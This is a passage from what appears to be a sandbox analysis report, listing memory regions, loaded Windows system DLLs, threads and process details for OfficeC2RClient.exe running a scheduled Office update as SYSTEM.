"c:\\windows\\system32\\fwpuclnt.dll") Region: id = 7078 start_va = 0x7ffc514b0000 end_va = 0x7ffc514c5fff entry_point = 0x7ffc514b0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7079 start_va = 0x7ffc53830000 end_va = 0x7ffc5383bfff entry_point = 0x7ffc53830000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7080 start_va = 0x7ffc53840000 end_va = 0x7ffc53865fff entry_point = 0x7ffc53840000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7081 start_va = 0x7ffc46650000 end_va = 0x7ffc466a9fff entry_point = 0x7ffc46650000 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 7082 start_va = 0x7ffc50ec0000 end_va = 0x7ffc50ed7fff entry_point = 0x7ffc50ec0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7083 start_va = 0x7ffc53f30000 end_va = 0x7ffc53f65fff entry_point = 0x7ffc53f30000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 7084 start_va = 0x7ffc53f70000 end_va = 0x7ffc53f95fff entry_point = 0x7ffc53f70000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 7085 start_va = 0x7ffc541f0000 end_va = 0x7ffc541f9fff entry_point = 0x7ffc541f0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 7086 start_va = 0x7ffc55220000 end_va = 0x7ffc5527afff entry_point = 0x7ffc55220000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 7087 start_va = 0x3688e20000 end_va = 0x3688e21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003688e20000" filename = "" Region: id = 7088 start_va = 0x368aa10000 end_va = 0x368aa19fff entry_point = 0x368aa10000 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 7089 start_va = 0x368b9b0000 end_va = 0x368baaffff entry_point = 0x0 region_type = private name = "private_0x000000368b9b0000" filename = "" Region: id = 7090 start_va = 0x368bab0000 end_va = 0x368beaffff entry_point = 0x0 region_type = private name = "private_0x000000368bab0000" filename = "" Region: id = 7091 start_va = 0x7ff70e634000 end_va = 0x7ff70e635fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e634000" filename = "" Region: id = 7092 start_va = 0x7ffc42390000 end_va = 0x7ffc423a3fff entry_point = 0x7ffc42390000 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 7093 start_va = 0x7ffc42440000 end_va = 0x7ffc4245efff entry_point = 0x7ffc42440000 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 7094 start_va = 0x7ffc534a0000 end_va = 0x7ffc534c2fff entry_point = 0x7ffc534a0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 7095 start_va = 0x7ffc53980000 end_va = 0x7ffc539f3fff entry_point = 0x7ffc53980000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Thread: id = 136 os_tid = 0xe14 Thread: id = 137 os_tid = 0xe38 Thread: id = 141 os_tid = 0xe94 Thread: id = 142 os_tid = 0xe8c Thread: id = 143 os_tid = 0xe84 Thread: id = 144 os_tid = 0xe70 Thread: id = 147 os_tid = 0x6b4 Thread: id = 148 os_tid = 0xd60 Thread: id = 166 os_tid = 0xcf8 Thread: id = 167 os_tid = 0xe6c Thread: id = 168 os_tid = 0xc48 Thread: id = 173 os_tid = 0xef8 Thread: id = 177 os_tid = 0xed4 Process: id = "11" image_name = "officec2rclient.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe" page_root = "0x47a03000" os_pid = "0x618" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x6d0" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\" /frequentupdate SCHEDULEDTASK displaylevel=False" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b5ca" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 6691 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6692 start_va = 0x8355de0000 end_va = 0x8355dfffff entry_point = 0x0 region_type = private name = "private_0x0000008355de0000" filename = "" Region: id = 6693 start_va = 0x8355e00000 end_va = 0x8355e13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008355e00000" filename = "" Region: id = 6694 start_va = 0x8355e20000 end_va = 0x8355f1ffff entry_point = 0x0 region_type = private name = "private_0x0000008355e20000" filename = "" Region: id = 6695 start_va = 0x8355f20000 end_va = 0x8355f23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008355f20000" filename = "" Region: id = 6696 start_va = 0x8355f30000 end_va = 0x8355f30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008355f30000" filename = "" Region: id = 6697 start_va = 0x8355f40000 end_va = 0x8355f41fff entry_point = 0x0 region_type = private name = "private_0x0000008355f40000" filename = "" Region: id = 6698 start_va = 0x7df5ffe60000 end_va = 0x7ff5ffe5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe60000" filename = "" Region: id = 6699 start_va = 0x7ff6ec7d0000 end_va = 0x7ff6ec7f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6ec7d0000" filename = "" Region: id = 6700 start_va = 0x7ff6ec7fa000 end_va = 0x7ff6ec7fafff entry_point = 0x0 region_type = private name = "private_0x00007ff6ec7fa000" filename = "" Region: id = 6701 start_va = 0x7ff6ec7fe000 end_va = 0x7ff6ec7fffff entry_point = 0x0 region_type = private name = "private_0x00007ff6ec7fe000" filename = "" Region: id = 6702 start_va = 0x7ff6ed240000 end_va = 0x7ff6ee964fff entry_point = 0x7ff6ed240000 region_type = mapped_file name = "officec2rclient.exe" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe") Region: id = 6703 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6704 start_va = 0x8355f90000 end_va = 0x835608ffff entry_point = 0x0 region_type = private name = "private_0x0000008355f90000" filename = "" Region: id = 6705 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6706 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6707 start_va = 0x8355de0000 end_va = 0x8355deffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008355de0000" filename = "" Region: id = 6708 start_va = 0x8355df0000 end_va = 0x8355df6fff entry_point = 0x0 region_type = private name = "private_0x0000008355df0000" filename = "" Region: id = 6709 start_va = 0x8355f50000 end_va = 0x8355f56fff entry_point = 0x0 region_type = private name = "private_0x0000008355f50000" filename = "" Region: id = 6710 start_va = 0x8355f60000 end_va = 0x8355f60fff entry_point = 0x0 region_type = private name = "private_0x0000008355f60000" filename = "" Region: id = 6711 start_va = 0x8355f70000 end_va = 0x8355f70fff entry_point = 0x0 region_type = private name = "private_0x0000008355f70000" filename = "" Region: id = 6712 start_va = 0x8356090000 end_va = 0x835614dfff entry_point = 0x8356090000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6713 start_va = 0x8356150000 end_va = 0x835624ffff entry_point = 0x0 region_type = private name = "private_0x0000008356150000" filename = "" Region: id = 6714 start_va = 0x8356250000 end_va = 0x835630ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008356250000" filename = "" Region: id = 6715 start_va = 0x8356340000 end_va = 0x835634ffff entry_point = 0x0 region_type = private name = "private_0x0000008356340000" filename = "" Region: id = 6716 start_va = 0x8356350000 end_va = 0x83564d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008356350000" filename = "" Region: id = 6717 start_va = 0x83564e0000 end_va = 0x8356660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000083564e0000" filename = "" Region: id = 6718 start_va = 0x7ff6ec6d0000 end_va = 0x7ff6ec7cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6ec6d0000" filename = "" Region: id = 6719 start_va = 0x7ff6ec7fc000 end_va = 0x7ff6ec7fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6ec7fc000" filename = "" Region: id = 6720 start_va = 0x7ffc40160000 end_va = 0x7ffc401fdfff entry_point = 0x7ffc40160000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 6721 start_va = 0x7ffc4cec0000 end_va = 0x7ffc4cefbfff entry_point = 0x7ffc4cec0000 region_type = mapped_file name = "apiclient.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll") Region: id = 6722 start_va = 0x7ffc4db10000 end_va = 0x7ffc4dbb6fff entry_point = 0x7ffc4db10000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll") Region: id = 6723 start_va = 0x7ffc4dbc0000 end_va = 0x7ffc4dbd5fff entry_point = 0x7ffc4dbc0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll") Region: id = 6724 start_va = 0x7ffc4f660000 end_va = 0x7ffc4f686fff entry_point = 0x7ffc4f660000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 6725 start_va = 0x7ffc50400000 end_va = 0x7ffc504f1fff entry_point = 0x7ffc50400000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 6726 start_va = 0x7ffc51470000 end_va = 0x7ffc5148efff entry_point = 0x7ffc51470000 region_type = mapped_file name = "hlink.dll" filename = "\\Windows\\System32\\hlink.dll" (normalized: "c:\\windows\\system32\\hlink.dll") Region: id = 6727 start_va = 0x7ffc51a30000 end_va = 0x7ffc51a36fff entry_point = 0x7ffc51a30000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 6728 start_va = 0x7ffc52640000 end_va = 0x7ffc52652fff entry_point = 0x7ffc52640000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 6729 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6730 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6731 start_va = 0x7ffc545f0000 end_va = 0x7ffc54600fff entry_point = 0x7ffc545f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 6732 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6733 start_va = 0x7ffc54620000 end_va = 0x7ffc54663fff entry_point = 0x7ffc54620000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 6734 start_va = 0x7ffc54670000 end_va = 0x7ffc54c97fff entry_point = 0x7ffc54670000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6735 start_va = 0x7ffc54ca0000 end_va = 0x7ffc54cf3fff entry_point = 0x7ffc54ca0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 6736 start_va = 0x7ffc54db0000 end_va = 0x7ffc54f70fff entry_point = 0x7ffc54db0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 6737 start_va = 0x7ffc54f80000 end_va = 0x7ffc55032fff entry_point = 0x7ffc54f80000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6738 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6739 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6740 start_va = 0x7ffc55630000 end_va = 0x7ffc557f4fff entry_point = 0x7ffc55630000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 6741 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6742 start_va = 0x7ffc559d0000 end_va = 0x7ffc56ef4fff entry_point = 0x7ffc559d0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6743 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6744 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6745 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6746 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6747 start_va = 0x7ffc57750000 end_va = 0x7ffc57890fff entry_point = 0x7ffc57750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6748 start_va = 0x7ffc578a0000 end_va = 0x7ffc578f0fff entry_point = 0x7ffc578a0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6749 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6804 start_va = 0x8355f80000 end_va = 0x8355f80fff entry_point = 0x0 region_type = private name = "private_0x0000008355f80000" filename = "" Region: id = 6805 start_va = 0x8356310000 end_va = 0x8356310fff entry_point = 0x0 region_type = private name = "private_0x0000008356310000" filename = "" Region: id = 6806 start_va = 0x8356320000 end_va = 0x835632ffff entry_point = 0x0 region_type = private name = "private_0x0000008356320000" filename = "" Region: id = 6807 start_va = 0x8356670000 end_va = 0x835676ffff entry_point = 0x0 region_type = private name = "private_0x0000008356670000" filename = "" Region: id = 6808 start_va = 0x83567a0000 end_va = 0x83567affff entry_point = 0x0 region_type = private name = "private_0x00000083567a0000" filename = "" Region: id = 6809 start_va = 0x83567b0000 end_va = 0x8356ae6fff entry_point = 0x83567b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6810 start_va = 0x8356af0000 end_va = 0x8356ceffff entry_point = 0x0 region_type = private name = "private_0x0000008356af0000" filename = "" Region: id = 6811 start_va = 0x7ffc4fe10000 end_va = 0x7ffc50354fff entry_point = 0x7ffc4fe10000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 6812 start_va = 0x7ffc525f0000 end_va = 0x7ffc52611fff entry_point = 0x7ffc525f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 6813 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6814 start_va = 0x7ffc4d010000 end_va = 0x7ffc4d0b9fff entry_point = 0x7ffc4d010000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll") Region: id = 6815 start_va = 0x8356e30000 end_va = 0x8356e3ffff entry_point = 0x0 region_type = private name = "private_0x0000008356e30000" filename = "" Region: id = 6816 start_va = 0x7ffc522a0000 end_va = 0x7ffc5233bfff entry_point = 0x7ffc522a0000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 6817 start_va = 0x7ffc53720000 end_va = 0x7ffc53777fff entry_point = 0x7ffc53720000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 6818 start_va = 0x7ffc531b0000 end_va = 0x7ffc531d7fff entry_point = 0x7ffc531b0000 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 6819 start_va = 0x8356330000 end_va = 0x8356331fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008356330000" filename = "" Region: id = 6820 start_va = 0x7ffc4b930000 end_va = 0x7ffc4bc6cfff entry_point = 0x7ffc4b930000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 6821 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6822 start_va = 0x7ffc4cbd0000 end_va = 0x7ffc4ce43fff entry_point = 0x7ffc4cbd0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 6845 start_va = 0x8356770000 end_va = 0x8356770fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008356770000" filename = "" Region: id = 6846 start_va = 0x8356780000 end_va = 0x8356781fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008356780000" filename = "" Region: id = 6847 start_va = 0x8356cf0000 end_va = 0x8356deffff entry_point = 0x0 region_type = private name = "private_0x0000008356cf0000" filename = "" Region: id = 6848 start_va = 0x7ff6ec7f8000 end_va = 0x7ff6ec7f9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ec7f8000" filename = "" Region: id = 6849 start_va = 0x7ffc4fb00000 end_va = 0x7ffc4fb35fff entry_point = 0x7ffc4fb00000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 6998 start_va = 0x8356e40000 end_va = 0x8356f3ffff entry_point = 0x0 region_type = private name = "private_0x0000008356e40000" filename = "" Region: id = 6999 start_va = 0x8356f40000 end_va = 0x835703ffff entry_point = 0x0 region_type = private name = "private_0x0000008356f40000" filename = "" Region: id = 7000 start_va = 0x8357040000 end_va = 0x835713ffff entry_point = 0x0 region_type = private name = "private_0x0000008357040000" filename = "" Region: id = 7001 start_va = 0x8357140000 end_va = 0x835723ffff entry_point = 0x0 region_type = private name = "private_0x0000008357140000" filename = "" Region: id = 7002 start_va = 0x7ff6ec6cc000 end_va = 0x7ff6ec6cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6ec6cc000" filename = "" Region: id = 7003 start_va = 0x7ff6ec6ce000 end_va = 0x7ff6ec6cffff entry_point = 0x0 region_type = private name = "private_0x00007ff6ec6ce000" filename = "" Region: id = 7004 start_va = 0x7ff6ec7f4000 end_va = 0x7ff6ec7f5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ec7f4000" filename = "" Region: id = 7005 start_va = 0x7ff6ec7f6000 end_va = 0x7ff6ec7f7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ec7f6000" filename = "" Region: id = 7006 start_va = 0x7ffc4b540000 end_va = 0x7ffc4b6d6fff entry_point = 0x7ffc4b540000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 7007 start_va = 0x7ffc4ddd0000 end_va = 0x7ffc4e145fff entry_point = 0x7ffc4ddd0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 7008 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 7009 start_va = 0x7ffc55280000 end_va = 0x7ffc552b5fff entry_point = 0x7ffc55280000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7010 start_va = 0x7ffc55380000 end_va = 0x7ffc554dbfff entry_point = 0x7ffc55380000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7011 start_va = 0x7ffc57450000 end_va = 0x7ffc57456fff entry_point = 0x7ffc57450000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 7016 start_va = 0x8356790000 end_va = 0x8356790fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008356790000" filename = "" Region: id = 7017 start_va = 0x7ffc4b290000 end_va = 0x7ffc4b536fff entry_point = 0x7ffc4b290000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 7018 start_va = 0x7ffc4b890000 end_va = 0x7ffc4b899fff entry_point = 0x7ffc4b890000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 7019 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 7020 start_va = 0x8356df0000 end_va = 0x8356df0fff entry_point = 0x8356df0000 region_type = mapped_file name = "counters.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 7021 start_va = 0x8357240000 end_va = 0x835733ffff entry_point = 0x0 region_type = private name = "private_0x0000008357240000" filename = "" Region: id = 7022 start_va = 0x7ff6ec6ca000 end_va = 0x7ff6ec6cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6ec6ca000" filename = "" Region: id = 7023 start_va = 0x7ffc4b8c0000 end_va = 0x7ffc4b8d4fff entry_point = 0x7ffc4b8c0000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 7024 start_va = 0x7ffc4d9d0000 end_va = 0x7ffc4daa5fff entry_point = 0x7ffc4d9d0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 7025 